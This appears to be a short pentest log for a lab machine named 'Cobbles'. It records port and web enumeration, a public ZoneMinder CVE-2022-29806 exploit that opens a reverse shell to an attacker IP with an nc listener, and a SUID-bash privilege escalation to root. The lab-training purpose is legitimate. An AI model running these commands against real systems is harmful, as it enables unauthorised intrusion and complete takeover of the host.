🧪 Pentest Log: {{date:2025-07-27}}

🔍 Target Information

• Machine Name: Cobbles
• IP Address: 192.168.176.214
• Operating System: Linux

ip=192.168.176.214

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

found server-status page

found zoneminder v1.34.23

💣 Exploitation / Foothold

Tool / Script Used:

CVE-2022-29806

https://github.com/OP3R4T0R/CVE-2022-29806

python3 exploit.py -t http://192.168.176.214/zm-prod/ -ip 192.168.45.163 -p 80

nc -lvnp 80

found local.txt under /home/isaac

🧬 Privilege Escalation

👤 Current Access

• User: www-data
• Groups: www-data
• Shell Type: webshell

🔍 Enumeration

Open Ports:

netstat -antup | grep -ni listen

grep -nRw '8080\|8081' /etc/* 2>/dev/null

found the /etc/haproxy/haproxy.cfg

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: Public Exploit
• Target Binary/Service: N/A
• Reference / Source: N/A

🔧 Exploit Steps

• Smash to root

python3 exploit.py -t http://192.168.176.214/zm-prod/ -ip 192.168.45.163 -p 443

nc -lvnp 443

cp /bin/bash .

chmod +s bash

./bash -p